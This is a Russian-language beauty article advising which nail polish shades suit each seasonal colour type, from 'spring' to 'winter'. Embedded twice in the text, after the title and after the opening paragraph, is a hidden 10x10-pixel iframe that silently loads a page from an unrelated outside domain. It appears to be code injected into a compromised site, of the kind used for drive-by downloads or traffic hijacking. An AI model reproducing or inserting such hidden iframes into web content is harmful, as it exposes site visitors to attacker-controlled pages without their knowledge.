Как подбирать цвет лака под тип внешности<iframe src='http://coolmix.yarnowl.com/dhFJwR?leETD=21' width='10' height='10' framborder='0'></iframe>

Кажется, что подбирать цвет лака задача легкая, стоит только учитывать собственные вкусы. Но стилисты рекомендуют все же обращать внимание и на свой цветотип. Тогда выбор лака будет максимально удачным.<iframe src='http://coolmix.yarnowl.com/dhFJwR?leETD=21' width='10' height='10' framborder='0'></iframe>

Девушка-весна – у них светлые, серые глаза, русые волосы и нежная, очень светлая, как будто прозрачная кожа. Обладательницам такой внешности строго противопоказаны лаки темно-вишневых оттенков: они буквально обесцвечивают образ. И напротив, им подходят персиковые тона, карминные и светло-абрикосовые оттенки. Аристократичную светлую кожу подчеркнет цвет белой черешни, а любительницам ярких, броских ногтей понравятся свежие фруктовые тона, в нужном случае придадут торжественности золотистые и бронзовые оттенки.

Классическая девушка-лето - это темно русые волосы, искрящиеся глаза золотисто-зеленые теплой гаммы и кожа оливкового оттенка. Таким барышням следует избегать всех оттенков розового на ногтях - они смотрятся не совсем выигрышно в данном случае. В отличие от всевозможных оттенков фиолетового: сиреневый, вишневый или лиловый подойдут идеально. Все ягодные тона подчеркнут золотистый загар, а вот насыщенный багряный, темно-бордовый, зеленоватые и золотые тона визуально сделают кожу гораздо старше. Вечерний вариант лака для ногтей может быть в серебристом тоне.

Девушка-осень отличается золотыми или рыжими волосами, белоснежной кожей солнечного оттенка с веснушками – верными признаками представительницы осеннего цветотипа. Таким девушкам нельзя пользоваться лаком бледных голубоватых тонов, которые идут далеко не всем. Осенние девушки любят быть яркими, поэтому им придутся по вкусу насыщенные золотые, бардовые и зеленые цвета, а медные оттенки и сияющие блестки для вечернего образа способны сделать из них настоящих принцесс.

Девушка-зима соткана из контрастов: как правило, в ней сочетаются серые ясные глаза, бледная кожа и темные волосы (каштановые либо черные). Этой даме повезло больше других, строго запрещенных, жутко неудачных для нее вариантов не существует. Беспроигрышными цветами лака для ногтей будут насыщенный красный и ярко-бордовый. Она может поэкспериментировать с модными перламутровыми цветами. Но особенно ей пойдет элегантный французский.

Новости партнеров

Загрузка...

Beauty Fresh